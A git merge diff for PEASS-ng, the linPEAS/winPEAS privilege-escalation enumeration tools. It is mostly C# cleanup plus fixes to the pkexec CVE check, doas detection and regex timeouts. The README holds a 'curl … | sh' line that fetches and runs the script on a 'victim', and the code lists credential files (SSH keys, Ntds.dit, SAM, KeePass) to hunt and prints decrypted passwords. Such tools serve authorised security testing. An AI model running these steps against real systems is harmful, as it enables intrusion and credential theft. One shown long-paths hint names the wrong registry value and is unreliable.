Merge pull request #329 from godylockz/master

Fix Internet Explorer Enumeration

.github/workflows/CI-master_tests.yml

@@ -1,10 +1,6 @@
 name: CI-master_test
 
-on:
+on:  
-  pull_request:
-    branches:
-      - master
-  
   schedule:
     - cron: "5 4 * * SUN"
 

linPEAS/README.md

@@ -22,7 +22,7 @@ curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas
 
 ```bash
 # Local network
-sudo python -m SimpleHTTPServer 80 #Host
+sudo python -m http.server 80 #Host
 curl 10.10.10.10/linpeas.sh | sh #Victim
 
 # Without curl
@@ -47,6 +47,12 @@ chmod +x linpeas_linux_amd64
 ./linpeas_linux_amd64
 ```
 
+```bash
+# Execute from memory in Penelope session
+# From: https://github.com/brightio/penelope
+> run peass-ng
+```
+
 ## Firmware Analysis
 If you have a **firmware** and you want to **analyze it with linpeas** to **search for passwords or bad configured permissions** you have 2 main options.
 

linPEAS/builder/linpeas_parts/1_system_information.sh

@@ -25,7 +25,7 @@ echo ""
 print_2title "CVEs Check"
 
 #-- SY) CVE-2021-4034
-if [ `command -v pkexec` ] && stat -c '%a' $(which pkexec) | grep -q 4755 && [ "$(stat -c '%Y' $(which pkexec))" -lt "1642035600" ]; then 
+if [ `command -v pkexec` ] && stat -c '%a' $(which pkexec) | grep -q 4755 && [ "$(stat -c '%Y' $(which pkexec))" -lt "1641942000" ]; then 
     echo "Vulnerable to CVE-2021-4034" | sed -${E} "s,.*,${SED_RED_YELLOW},"
     echo ""
 fi

linPEAS/builder/linpeas_parts/6_users_information.sh

@@ -105,7 +105,7 @@ fi
 echo ""
 
 #-- UI) Doas
-if [ -f "/etc/doas.conf" ] || [ "$DEBUG" ]; then
+if [ "$(command -v doas 2>/dev/null)" ] || [ "$DEBUG" ]; then
   print_2title "Checking doas.conf"
   doas_dir_name=$(dirname "$(command -v doas)" 2>/dev/null)
   if [ "$(cat /etc/doas.conf $doas_dir_name/doas.conf $doas_dir_name/../etc/doas.conf $doas_dir_name/etc/doas.conf 2>/dev/null)" ]; then 

linPEAS/builder/linpeas_parts/linpeas_base.sh

@@ -808,7 +808,7 @@ basic_net_info(){
 select_nc (){
   #Select the correct configuration of the netcat found
   NC_SCAN="$FOUND_NC -v -n -z -w 1"
-  $($FOUND_NC 127.0.0.1 65321 > /dev/null 2>&1)
+  $($NC_SCAN 127.0.0.1 65321 > /dev/null 2>&1)
   if [ $? -eq 2 ]
   then
     NC_SCAN="timeout 1 $FOUND_NC -v -n"

parsers/README.md

@@ -3,7 +3,7 @@
 These scripts allows you to transform the output of linpeas/macpeas/winpeas to JSON and then to PDF and HTML.
 
 ```python3
-python3 peass2json.py </path/to/executed_peass.out> </path/to/peass.json>
+python3 peas2json.py </path/to/executed_peass.out> </path/to/peass.json>
 python3 json2pdf.py </path/to/peass.json> </path/to/peass.pdf>
 python3 json2html.py </path/to/peass.json> </path/to/peass.html>
 ```

winPEAS/winPEASexe/Tests/Properties/AssemblyInfo.cs

@@ -1,5 +1,4 @@
 using System.Reflection;
-using System.Runtime.CompilerServices;
 using System.Runtime.InteropServices;
 
 // General Information about an assembly is controlled through the following

winPEAS/winPEASexe/Tests/SmokeTests.cs

@@ -11,8 +11,8 @@ namespace winPEAS.Tests
         {
             try
             {
-                string[] args = new string[] { 
+                string[] args = new string[] {
-                    "systeminfo", "servicesinfo", "processinfo", "applicationsinfo", "browserinfo", "debug" 
+                    "systeminfo", "servicesinfo", "processinfo", "applicationsinfo", "browserinfo", "debug"
                 };
                 Program.Main(args);
             }

winPEAS/winPEASexe/winPEAS/App.config

@@ -3,4 +3,7 @@
     <startup useLegacyV2RuntimeActivationPolicy="true"> 
         
     <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5.2"/></startup>
+    <runtime>
+		<AppContextSwitchOverrides value="Switch.System.IO.UseLegacyPathHandling=false" />
+	</runtime>
 </configuration>

winPEAS/winPEASexe/winPEAS/Checks/ApplicationsInfo.cs

@@ -27,8 +27,8 @@ namespace winPEAS.Checks
             {
                 Beaprint.MainPrint("Current Active Window Application");
                 string title = ApplicationInfoHelper.GetActiveWindowTitle();
-                List<string> permsFile = PermissionsHelper.GetPermissionsFile(title, winPEAS.Checks.Checks.CurrentUserSiDs);
+                List<string> permsFile = PermissionsHelper.GetPermissionsFile(title, Checks.CurrentUserSiDs);
-                List<string> permsFolder = PermissionsHelper.GetPermissionsFolder(title, winPEAS.Checks.Checks.CurrentUserSiDs);
+                List<string> permsFolder = PermissionsHelper.GetPermissionsFolder(title, Checks.CurrentUserSiDs);
                 if (permsFile.Count > 0)
                 {
                     Beaprint.BadPrint("    " + title);
@@ -188,8 +188,8 @@ namespace winPEAS.Checks
 
                 foreach (Dictionary<string, string> sapp in scheduled_apps)
                 {
-                    List<string> fileRights = PermissionsHelper.GetPermissionsFile(sapp["Action"], winPEAS.Checks.Checks.CurrentUserSiDs);
+                    List<string> fileRights = PermissionsHelper.GetPermissionsFile(sapp["Action"], Checks.CurrentUserSiDs);
-                    List<string> dirRights = PermissionsHelper.GetPermissionsFolder(sapp["Action"], winPEAS.Checks.Checks.CurrentUserSiDs);
+                    List<string> dirRights = PermissionsHelper.GetPermissionsFolder(sapp["Action"], Checks.CurrentUserSiDs);
                     string formString = "    ({0}) {1}: {2}";
 
                     if (fileRights.Count > 0)
@@ -238,8 +238,8 @@ namespace winPEAS.Checks
                 foreach (var driver in DeviceDrivers.GetDeviceDriversNoMicrosoft())
                 {
                     string pathDriver = driver.Key;
-                    List<string> fileRights = PermissionsHelper.GetPermissionsFile(pathDriver, winPEAS.Checks.Checks.CurrentUserSiDs);
+                    List<string> fileRights = PermissionsHelper.GetPermissionsFile(pathDriver, Checks.CurrentUserSiDs);
-                    List<string> dirRights = PermissionsHelper.GetPermissionsFolder(pathDriver, winPEAS.Checks.Checks.CurrentUserSiDs);
+                    List<string> dirRights = PermissionsHelper.GetPermissionsFolder(pathDriver, Checks.CurrentUserSiDs);
 
                     Dictionary<string, string> colorsD = new Dictionary<string, string>()
                         {

winPEAS/winPEASexe/winPEAS/Checks/Checks.cs

@@ -169,7 +169,7 @@ namespace winPEAS.Checks
                     {
                         MaxRegexFileSize = Int32.Parse(parts[1]);
                     }
-                        
+
                 }
 
                 if (string.Equals(arg, "-lolbas", StringComparison.CurrentCultureIgnoreCase))
@@ -363,8 +363,8 @@ namespace winPEAS.Checks
             try
             {
                 Beaprint.GrayPrint("   - Creating disabled users list...");
-                Checks.PaintDisabledUsers = string.Join("|", User.GetMachineUsers(false, true, false, false, false));
+                PaintDisabledUsers = string.Join("|", User.GetMachineUsers(false, true, false, false, false));
-                PaintDisabledUsersNoAdministrator = Checks.PaintDisabledUsers.Replace("|Administrator", "").Replace("Administrator|", "").Replace("Administrator", "");
+                PaintDisabledUsersNoAdministrator = PaintDisabledUsers.Replace("|Administrator", "").Replace("Administrator|", "").Replace("Administrator", "");
             }
             catch (Exception ex)
             {
@@ -411,7 +411,7 @@ namespace winPEAS.Checks
             try
             {
                 if (RegistryHelper.GetRegValue("HKCU", "CONSOLE", "VirtualTerminalLevel") == "" && RegistryHelper.GetRegValue("HKCU", "CONSOLE", "VirtualTerminalLevel") == "")
-                    System.Console.WriteLine(@"ANSI color bit for Windows is not set. If you are execcuting this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD");
+                    Console.WriteLine(@"ANSI color bit for Windows is not set. If you are executing this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD");
             }
             catch (Exception ex)
             {
@@ -425,7 +425,7 @@ namespace winPEAS.Checks
             {
                 if (RegistryHelper.GetRegValue("HKLM", @"SYSTEM\CurrentControlSet\Control\FileSystem", "LongPathsEnabled") != "1")
                 {
-                    System.Console.WriteLine(@"Long paths are disabled, so the maximum length of a path supported is 260chars (this may cause false negatives when looking for files). If you are admin, you can enable it with 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD");
+                    Console.WriteLine(@"Long paths are disabled, so the maximum length of a path supported is 260 chars (this may cause false negatives when looking for files). If you are admin, you can enable it with 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD");
                     IsLongPath = false;
                 }
                 else

winPEAS/winPEASexe/winPEAS/Checks/EventsInfo.cs

@@ -10,7 +10,7 @@ using winPEAS.Info.EventsInfo.ProcessCreation;
 namespace winPEAS.Checks
 {
     internal class EventsInfo : ISystemCheck
-    {       
+    {
         public void PrintInfo(bool isDebug)
         {
             Beaprint.GreatPrint("Interesting Events information");
@@ -23,7 +23,7 @@ namespace winPEAS.Checks
                 PrintPowerShellEvents,
                 PowerOnEvents,
             }.ForEach(action => CheckRunner.Run(action, isDebug));
-        }        
+        }
 
         private static void PrintPowerShellEvents()
         {
@@ -91,7 +91,7 @@ namespace winPEAS.Checks
                 }
 
                 var logonInfos = Logon.GetLogonInfos(lastDays);
-                
+
                 foreach (var info in logonInfos.LogonEventInfos)
                 {
                     Beaprint.BadPrint($"  Subject User Name            :       {info.SubjectUserName}\n" +
@@ -102,13 +102,13 @@ namespace winPEAS.Checks
                                       $"  Lm Package                   :       {info.LmPackage}\n" +
                                       $"  Logon Type                   :       {info.LogonType}\n" +
                                       $"  Target User Name             :       {info.TargetUserName}\n" +
-                                      $"  Target Domain Name           :       {info.TargetDomainName}\n" +                                      
+                                      $"  Target Domain Name           :       {info.TargetDomainName}\n" +
                                       $"  Target Outbound User Name    :       {info.TargetOutboundUserName}\n" +
                                       $"  Target Outbound Domain Name  :       {info.TargetOutboundDomainName}\n");
 
                     Beaprint.PrintLineSeparator();
                 }
-                
+
                 if (logonInfos.NTLMv1LoggedUsersSet.Count > 0 || logonInfos.NTLMv2LoggedUsersSet.Count > 0)
                 {
                     Beaprint.BadPrint("  NTLM relay might be possible - other users authenticate to this machine using NTLM!");
@@ -151,7 +151,7 @@ namespace winPEAS.Checks
             {
                 var lastDays = 30;
 
-                Beaprint.MainPrint($"Printing Explicit Credential Events (4648) for last {lastDays} days - A process logged on using plaintext credentials\n");                                
+                Beaprint.MainPrint($"Printing Explicit Credential Events (4648) for last {lastDays} days - A process logged on using plaintext credentials\n");
 
                 if (!MyUtils.IsHighIntegrity())
                 {

winPEAS/winPEASexe/winPEAS/Checks/FileAnalysis.cs

@@ -27,7 +27,7 @@ namespace winPEAS.Checks
             }.ForEach(action => CheckRunner.Run(action, isDebug));
         }
 
-        private static List<CustomFileInfo> InitializeFileSearch(bool useProgramFiles=true)
+        private static List<CustomFileInfo> InitializeFileSearch(bool useProgramFiles = true)
         {
             var files = new List<CustomFileInfo>();
             var systemDrive = $"{SearchHelper.SystemDrive}\\";
@@ -101,7 +101,7 @@ namespace winPEAS.Checks
                             isFileFound = Regex.IsMatch(fold, pattern, RegexOptions.IgnoreCase);
                             if (isFileFound) break;
                         }
-                    }   
+                    }
                 }
                 else
                 {
@@ -118,7 +118,8 @@ namespace winPEAS.Checks
 
                 if (isFileFound)
                 {
-                    if (!somethingFound) {
+                    if (!somethingFound)
+                    {
                         Beaprint.MainPrint($"Found {searchName} Files");
                         somethingFound = true;
                     }
@@ -132,7 +133,7 @@ namespace winPEAS.Checks
                         }
                     }
                     // there are inner sections
-                    else 
+                    else
                     {
                         foreach (var innerFileToSearch in fileSettings.files)
                         {
@@ -143,7 +144,7 @@ namespace winPEAS.Checks
                 }
             }
 
-           
+
             return new bool[] { false, somethingFound };
         }
 
@@ -154,19 +155,43 @@ namespace winPEAS.Checks
             try
             {
                 Regex rgx;
-                if (caseinsensitive)
+                bool is_re_match = false;
-                    rgx = new Regex(regex_str.Trim(), RegexOptions.IgnoreCase);
+                try
-                else
+                {
-                    rgx = new Regex(regex_str.Trim());
+                    // Use "IsMatch" because it supports timeout, if exception is thrown exit the func to avoid ReDoS in "rgx.Matches"
+                    if (caseinsensitive)
+                    {
+                        is_re_match = Regex.IsMatch(text, regex_str.Trim(), RegexOptions.IgnoreCase, TimeSpan.FromSeconds(120));
+                        rgx = new Regex(regex_str.Trim(), RegexOptions.IgnoreCase);
+                    }
+                    else
+                    {
+                        is_re_match = Regex.IsMatch(text, regex_str.Trim(), RegexOptions.None, TimeSpan.FromSeconds(120));
+                        rgx = new Regex(regex_str.Trim());
+                    }
+                }
+                catch (RegexMatchTimeoutException e)
+                {
+                    if (Checks.IsDebug)
+                    {
+                        Beaprint.GrayPrint($"The regex {regex_str} had a timeout (ReDoS avoided but regex unchecked in a file)");
+                    }
+                    return foundMatches;
+                }
+
+                if (!is_re_match)
+                {
+                    return foundMatches;
+                }
 
                 int cont = 0;
                 foreach (Match match in rgx.Matches(text))
                 {
-                    if (cont > 4) break;
+                    if (cont > 10) break;
-                    
+
                     if (match.Value.Length < 400 && match.Value.Trim().Length > 2)
                         foundMatches.Add(match.Value);
-                    
+
                     cont++;
                 }
             }
@@ -324,12 +349,12 @@ namespace winPEAS.Checks
                                     {
                                         timer.Start();
                                     }
-                                    
+
 
                                     try
                                     {
-                                        string text = System.IO.File.ReadAllText(f.FullPath);
+                                        string text = File.ReadAllText(f.FullPath);
-                                        
+
                                         results = SearchContent(text, regex.regex, (bool)regex.caseinsensitive);
                                         if (results.Count > 0)
                                         {
@@ -349,7 +374,7 @@ namespace winPEAS.Checks
                                         timer.Stop();
 
                                         TimeSpan timeTaken = timer.Elapsed;
-                                        if (timeTaken.TotalMilliseconds > 1000)
+                                        if (timeTaken.TotalMilliseconds > 20000)
                                             Beaprint.PrintDebugLine($"\nThe regex {regex.regex} took {timeTaken.TotalMilliseconds}s in {f.FullPath}");
                                     }
                                 }
@@ -405,7 +430,7 @@ namespace winPEAS.Checks
             // . -> \.
             // * -> .*
             // add $ at the end to avoid false positives
-            
+
             var pattern = str.Replace(".", @"\.")
                              .Replace("*", @".*");
 
@@ -423,11 +448,11 @@ namespace winPEAS.Checks
             resultsCount++;
 
             if (resultsCount > ListFileLimit) return false;
-            
+
             // If contains undesireable string, stop processing
             if (fileSettings.remove_path != null && fileSettings.remove_path.Length > 0)
             {
-                foreach(var rem_path in fileSettings.remove_path.Split('|'))
+                foreach (var rem_path in fileSettings.remove_path.Split('|'))
                 {
                     if (fileInfo.FullPath.ToLower().Contains(rem_path.ToLower()))
                         return false;
@@ -436,19 +461,23 @@ namespace winPEAS.Checks
 
             if (fileSettings.type == "f")
             {
-                var colors = new Dictionary<string, string>();
+                var colors = new Dictionary<string, string>
-                colors.Add(fileInfo.Filename, Beaprint.ansi_color_bad);
+                {
+                    { fileInfo.Filename, Beaprint.ansi_color_bad }
+                };
                 Beaprint.AnsiPrint($"File: {fileInfo.FullPath}", colors);
 
-                if   (!(bool)fileSettings.just_list_file)
+                if (!(bool)fileSettings.just_list_file)
                 {
                     GrepResult(fileInfo, fileSettings);
                 }
             }
             else if (fileSettings.type == "d")
             {
-                var colors = new Dictionary<string, string>();
+                var colors = new Dictionary<string, string>
-                colors.Add(fileInfo.Filename, Beaprint.ansi_color_bad);
+                {
+                    { fileInfo.Filename, Beaprint.ansi_color_bad }
+                };
                 Beaprint.AnsiPrint($"Folder: {fileInfo.FullPath}", colors);
 
                 // just list the directory
@@ -463,7 +492,7 @@ namespace winPEAS.Checks
                 }
                 else
                 {
-                   // should not happen
+                    // should not happen
                 }
             }
 
@@ -507,11 +536,11 @@ namespace winPEAS.Checks
                 {
                     lineGrep = SanitizeLineGrep(fileSettings.line_grep);
                 }
-                
+
                 fileContent = fileContent.Where(line => (!string.IsNullOrWhiteSpace(fileSettings.good_regex) && Regex.IsMatch(line, fileSettings.good_regex, RegexOptions.IgnoreCase)) ||
                                                        (!string.IsNullOrWhiteSpace(fileSettings.bad_regex) && Regex.IsMatch(line, fileSettings.bad_regex, RegexOptions.IgnoreCase)) ||
                                                        (!string.IsNullOrWhiteSpace(lineGrep) && Regex.IsMatch(line, lineGrep, RegexOptions.IgnoreCase)));
-            }    
+            }
 
             var content = string.Join(Environment.NewLine, fileContent);
 

winPEAS/winPEASexe/winPEAS/Checks/FilesInfo.cs

@@ -21,7 +21,7 @@ namespace winPEAS.Checks
     internal class FilesInfo : ISystemCheck
     {
         static readonly string _patternsFileCredsColor = @"RDCMan.settings|.rdg|_history|httpd.conf|.htpasswd|.gitconfig|.git-credentials|Dockerfile|docker-compose.ymlaccess_tokens.db|accessTokens.json|azureProfile.json|appcmd.exe|scclient.exe|unattend.txt|access.log|error.log|credential|password|.gpg|.pgp|config.php|elasticsearch|kibana.|.p12|\.der|.csr|.crt|.cer|.pem|known_hosts|id_rsa|id_dsa|.ovpn|tomcat-users.xml|web.config|.kdbx|.key|KeePass.config|ntds.dir|Ntds.dit|sam|system|SAM|SYSTEM|security|software|SECURITY|SOFTWARE|FreeSSHDservice.ini|sysprep.inf|sysprep.xml|unattend.xml|unattended.xml|vnc|groups.xml|services.xml|scheduledtasks.xml|printers.xml|drives.xml|datasources.xml|php.ini|https.conf|https-xampp.conf|my.ini|my.cnf|access.log|error.log|server.xml|setupinfo|pagefile.sys|NetSetup.log|iis6.log|AppEvent.Evt|SecEvent.Evt|default.sav|security.sav|software.sav|system.sav|ntuser.dat|index.dat|bash.exe|wsl.exe";
-    //    static readonly string _patternsFileCreds = @"RDCMan.settings;*.rdg;*_history*;httpd.conf;.htpasswd;.gitconfig;.git-credentials;Dockerfile;docker-compose.yml;access_tokens.db;accessTokens.json;azureProfile.json;appcmd.exe;scclient.exe;*.gpg$;*.pgp$;*config*.php;elasticsearch.y*ml;kibana.y*ml;*.p12$;*.cer$;known_hosts;*id_rsa*;*id_dsa*;*.ovpn;tomcat-users.xml;web.config;*.kdbx;KeePass.config;Ntds.dit;SAM;SYSTEM;security;software;FreeSSHDservice.ini;sysprep.inf;sysprep.xml;*vnc*.ini;*vnc*.c*nf*;*vnc*.txt;*vnc*.xml;php.ini;https.conf;https-xampp.conf;my.ini;my.cnf;access.log;error.log;server.xml;ConsoleHost_history.txt;pagefile.sys;NetSetup.log;iis6.log;AppEvent.Evt;SecEvent.Evt;default.sav;security.sav;software.sav;system.sav;ntuser.dat;index.dat;bash.exe;wsl.exe;unattend.txt;*.der$;*.csr$;unattend.xml;unattended.xml;groups.xml;services.xml;scheduledtasks.xml;printers.xml;drives.xml;datasources.xml;setupinfo;setupinfo.bak";
+        //    static readonly string _patternsFileCreds = @"RDCMan.settings;*.rdg;*_history*;httpd.conf;.htpasswd;.gitconfig;.git-credentials;Dockerfile;docker-compose.yml;access_tokens.db;accessTokens.json;azureProfile.json;appcmd.exe;scclient.exe;*.gpg$;*.pgp$;*config*.php;elasticsearch.y*ml;kibana.y*ml;*.p12$;*.cer$;known_hosts;*id_rsa*;*id_dsa*;*.ovpn;tomcat-users.xml;web.config;*.kdbx;KeePass.config;Ntds.dit;SAM;SYSTEM;security;software;FreeSSHDservice.ini;sysprep.inf;sysprep.xml;*vnc*.ini;*vnc*.c*nf*;*vnc*.txt;*vnc*.xml;php.ini;https.conf;https-xampp.conf;my.ini;my.cnf;access.log;error.log;server.xml;ConsoleHost_history.txt;pagefile.sys;NetSetup.log;iis6.log;AppEvent.Evt;SecEvent.Evt;default.sav;security.sav;software.sav;system.sav;ntuser.dat;index.dat;bash.exe;wsl.exe;unattend.txt;*.der$;*.csr$;unattend.xml;unattended.xml;groups.xml;services.xml;scheduledtasks.xml;printers.xml;drives.xml;datasources.xml;setupinfo;setupinfo.bak";
 
         private static readonly IList<string> patternsFileCreds = new List<string>()
         {
@@ -159,7 +159,7 @@ namespace winPEAS.Checks
                     {
                         string formString = "    {0} ({1})\n    Accessed:{2} -- Size:{3}";
                         Beaprint.BadPrint(string.Format(formString, cc["file"], cc["Description"], cc["Accessed"], cc["Size"]));
-                        System.Console.WriteLine("");
+                        Console.WriteLine("");
                     }
                 }
                 else
@@ -182,7 +182,7 @@ namespace winPEAS.Checks
                 {
                     List<string> pwds = Unattended.ExtractUnattendedPwd(path);
                     Beaprint.BadPrint("    " + path);
-                    System.Console.WriteLine(string.Join("\n", pwds));
+                    Console.WriteLine(string.Join("\n", pwds));
                 }
             }
             catch (Exception ex)
@@ -233,11 +233,11 @@ namespace winPEAS.Checks
                     foreach (var site in sitelistFilesInfo.Sites)
                     {
                         Beaprint.NoColorPrint($"    Share Name            :       {site.ShareName}");
-                        PrintColored( $"    User Name             :       {site.UserName}", !string.IsNullOrWhiteSpace(site.UserName));
+                        PrintColored($"    User Name             :       {site.UserName}", !string.IsNullOrWhiteSpace(site.UserName));
-                        PrintColored( $"    Server                :       {site.Server}", !string.IsNullOrWhiteSpace(site.Server));
+                        PrintColored($"    Server                :       {site.Server}", !string.IsNullOrWhiteSpace(site.Server));
-                        PrintColored( $"    Encrypted Password    :       {site.EncPassword}", !string.IsNullOrWhiteSpace(site.EncPassword));
+                        PrintColored($"    Encrypted Password    :       {site.EncPassword}", !string.IsNullOrWhiteSpace(site.EncPassword));
-                        PrintColored( $"    Decrypted Password    :       {site.DecPassword}", !string.IsNullOrWhiteSpace(site.DecPassword));
+                        PrintColored($"    Decrypted Password    :       {site.DecPassword}", !string.IsNullOrWhiteSpace(site.DecPassword));
-                        Beaprint.NoColorPrint( $"    Domain Name           :       {site.DomainName}\n" +
+                        Beaprint.NoColorPrint($"    Domain Name           :       {site.DomainName}\n" +
                                                      $"    Name                  :       {site.Name}\n" +
                                                      $"    Type                  :       {site.Type}\n" +
                                                      $"    Relative Path         :       {site.RelativePath}\n");
@@ -291,7 +291,7 @@ namespace winPEAS.Checks
                         const string rootDirectory = "Root directory";
                         const string runWith = "Run command";
 
-                        var colors = new Dictionary<string, string>();                        
+                        var colors = new Dictionary<string, string>();
                         new List<string>
                         {
                             linpeas,
@@ -410,7 +410,7 @@ namespace winPEAS.Checks
         {
             try
             {
-                string pattern_color = "[cC][rR][eE][dD][eE][nN][tT][iI][aA][lL]|[pP][aA][sS][sS][wW][oO][rR][dD]";                                
+                string pattern_color = "[cC][rR][eE][dD][eE][nN][tT][iI][aA][lL]|[pP][aA][sS][sS][wW][oO][rR][dD]";
                 var validExtensions = new HashSet<string>
                 {
                     ".cnf",
@@ -431,7 +431,7 @@ namespace winPEAS.Checks
                 };
 
                 Beaprint.MainPrint("Looking for possible password files in users homes");
-                Beaprint.LinkPrint("https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#credentials-inside-files");               
+                Beaprint.LinkPrint("https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#credentials-inside-files");
                 var fileInfos = SearchHelper.SearchUserCredsFiles();
 
                 foreach (var fileInfo in fileInfos)
@@ -463,7 +463,7 @@ namespace winPEAS.Checks
             {
                 //string pattern_bin = _patternsFileCreds + ";*password*;*credential*";
                 string pattern_bin = string.Join(";", patternsFileCreds) + ";*password*;*credential*";
-                
+
                 Dictionary<string, string> colorF = new Dictionary<string, string>()
                 {
                     { _patternsFileCredsColor + "|.*password.*|.*credential.*", Beaprint.ansi_color_bad },
@@ -472,7 +472,7 @@ namespace winPEAS.Checks
                 Beaprint.MainPrint("Looking inside the Recycle Bin for creds files");
                 Beaprint.LinkPrint("https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#credentials-inside-files");
                 List<Dictionary<string, string>> recy_files = InterestingFiles.InterestingFiles.GetRecycleBin();
-                
+
                 foreach (Dictionary<string, string> rec_file in recy_files)
                 {
                     foreach (string pattern in pattern_bin.Split(';'))
@@ -480,7 +480,7 @@ namespace winPEAS.Checks
                         if (Regex.Match(rec_file["Name"], pattern.Replace("*", ".*"), RegexOptions.IgnoreCase).Success)
                         {
                             Beaprint.DictPrint(rec_file, colorF, true);
-                            System.Console.WriteLine();
+                            Console.WriteLine();
                         }
                     }
                 }
@@ -507,7 +507,7 @@ namespace winPEAS.Checks
 
                 Beaprint.MainPrint("Searching known files that can contain creds in home");
                 Beaprint.LinkPrint("https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#credentials-inside-files");
-               
+
                 var files = SearchHelper.SearchUsersInterestingFiles();
 
                 Beaprint.AnsiPrint("    " + string.Join("\n    ", files), colorF);
@@ -567,7 +567,7 @@ namespace winPEAS.Checks
             try
             {
                 Beaprint.MainPrint("Searching interesting files in other users home directories (can be slow)\n");
-                
+
                 // check if admin already, if yes, print a message, if not, try to enumerate all files
                 if (MyUtils.IsHighIntegrity())
                 {
@@ -751,7 +751,7 @@ namespace winPEAS.Checks
                 ".cmd"
             };
 
-            var files = SearchHelper.GetFilesFast(systemDrive, "*", excludedDirs);            
+            var files = SearchHelper.GetFilesFast(systemDrive, "*", excludedDirs);
 
             foreach (var file in files)
             {
@@ -825,14 +825,14 @@ namespace winPEAS.Checks
 
                 foreach (var certificateInfo in certificateInfos)
                 {
-                    
+
                     Beaprint.NoColorPrint($"  Issuer             : {certificateInfo.Issuer}\n" +
                                                 $"  Subject            : {certificateInfo.Subject}\n" +
-                                                $"  ValidDate          : {certificateInfo.ValidDate}\n"  +
+                                                $"  ValidDate          : {certificateInfo.ValidDate}\n" +
                                                 $"  ExpiryDate         : {certificateInfo.ExpiryDate}\n" +
-                                                $"  HasPrivateKey      : {certificateInfo.HasPrivateKey}\n"  +
+                                                $"  HasPrivateKey      : {certificateInfo.HasPrivateKey}\n" +
-                                                $"  StoreLocation      : {certificateInfo.StoreLocation}\n"  +
+                                                $"  StoreLocation      : {certificateInfo.StoreLocation}\n" +
-                                                $"  KeyExportable      : {certificateInfo.KeyExportable}\n"  +
+                                                $"  KeyExportable      : {certificateInfo.KeyExportable}\n" +
                                                 $"  Thumbprint         : {certificateInfo.Thumbprint}\n");
 
                     if (!string.IsNullOrEmpty(certificateInfo.Template))
@@ -885,7 +885,7 @@ namespace winPEAS.Checks
                     }
                     catch (Exception e)
                     {
-                    }   
+                    }
                 }
             }
             catch (Exception ex)
@@ -1033,7 +1033,7 @@ namespace winPEAS.Checks
                     //@"c:\windows.old",
                     rootUsersSearchPath,
                     documentsAndSettings
-                };               
+                };
 
                 var files = SearchHelper.GetFilesFast(systemDrive, "*", excludedDirs);
 

winPEAS/winPEASexe/winPEAS/Checks/NetworkInfo.cs

@@ -26,8 +26,8 @@ namespace winPEAS.Checks
 
         public void PrintInfo(bool isDebug)
         {
-            Beaprint.GreatPrint("Network Information");
+            Beaprint.GreatPrint("Network Information");
-           
+
             new List<Action>
             {
                 PrintNetShares,
@@ -81,7 +81,7 @@ namespace winPEAS.Checks
                 {
                     if (line.Length > 0 && line[0] != '#')
                     {
-                        System.Console.WriteLine("    " + line.Replace("\t", "    "));
+                        Console.WriteLine("    " + line.Replace("\t", "    "));
                     }
                 }
             }
@@ -304,8 +304,8 @@ namespace winPEAS.Checks
                 Beaprint.GrayPrint("    DENY rules:");
                 foreach (Dictionary<string, string> rule in Firewall.GetFirewallRules())
                 {
-                    string filePerms = string.Join(", ", PermissionsHelper.GetPermissionsFile(rule["AppName"], winPEAS.Checks.Checks.CurrentUserSiDs));
+                    string filePerms = string.Join(", ", PermissionsHelper.GetPermissionsFile(rule["AppName"], Checks.CurrentUserSiDs));
-                    string folderPerms = string.Join(", ", PermissionsHelper.GetPermissionsFolder(rule["AppName"], winPEAS.Checks.Checks.CurrentUserSiDs));
+                    string folderPerms = string.Join(", ", PermissionsHelper.GetPermissionsFolder(rule["AppName"], Checks.CurrentUserSiDs));
                     string formString = "    ({0}){1}[{2}]: {3} {4} {5} from {6} --> {7}";
                     if (filePerms.Length > 0)
                         formString += "\n    File Permissions: {8}";
@@ -389,8 +389,8 @@ namespace winPEAS.Checks
                 var info = InternetSettings.GetInternetSettingsInfo();
 
                 Beaprint.ColorPrint("  General Settings", Beaprint.LBLUE);
-                Beaprint.NoColorPrint($"  {"Hive",-10}  {"Key",-40}  {"Value"}");
+                Beaprint.NoColorPrint($"  {"Hive",-10}  {"Key",-40}  {"Value"}");
-                
+
                 foreach (var i in info.GeneralSettings)
                 {
                     Beaprint.NoColorPrint($"  {i.Hive,-10}  {i.ValueName,-40}  {i.Value}");
@@ -410,9 +410,9 @@ namespace winPEAS.Checks
                     {
                         Beaprint.NoColorPrint($"  {i.Hive,-10}  {i.ValueName,-40}  {i.Interpretation}");
                     }
-                }                
+                }
-
+
-                Beaprint.ColorPrint("\n  Zone Auth Settings", Beaprint.LBLUE);                
+                Beaprint.ColorPrint("\n  Zone Auth Settings", Beaprint.LBLUE);
                 if (info.ZoneAuthSettings.Count == 0)
                 {
                     Beaprint.NoColorPrint("  No Zone Auth Settings");
@@ -423,7 +423,7 @@ namespace winPEAS.Checks
                     {
                         Beaprint.NoColorPrint($"  {i.Interpretation}");
                     }
-                }                
+                }
             }
             catch (Exception ex)
             {

winPEAS/winPEASexe/winPEAS/Checks/ProcessInfo.cs

@@ -10,7 +10,7 @@ namespace winPEAS.Checks
     {
         public void PrintInfo(bool isDebug)
         {
-            Beaprint.GreatPrint("Processes Information");           
+            Beaprint.GreatPrint("Processes Information");
 
             new List<Action>
             {
@@ -101,7 +101,7 @@ namespace winPEAS.Checks
 
                 Beaprint.DictPrint(vulnHandlers, colors, true);
             }
-            
+
         }
     }
 }

winPEAS/winPEASexe/winPEAS/Checks/ServicesInfo.cs

@@ -20,7 +20,7 @@ namespace winPEAS.Checks
             {
                 CheckRunner.Run(() =>
                 {
-                    modifiableServices = ServicesInfoHelper.GetModifiableServices(winPEAS.Checks.Checks.CurrentUserSiDs);
+                    modifiableServices = ServicesInfoHelper.GetModifiableServices(Checks.CurrentUserSiDs);
                 }, isDebug);
             }
             catch (Exception ex)
@@ -53,12 +53,12 @@ namespace winPEAS.Checks
 
                 foreach (Dictionary<string, string> serviceInfo in services_info)
                 {
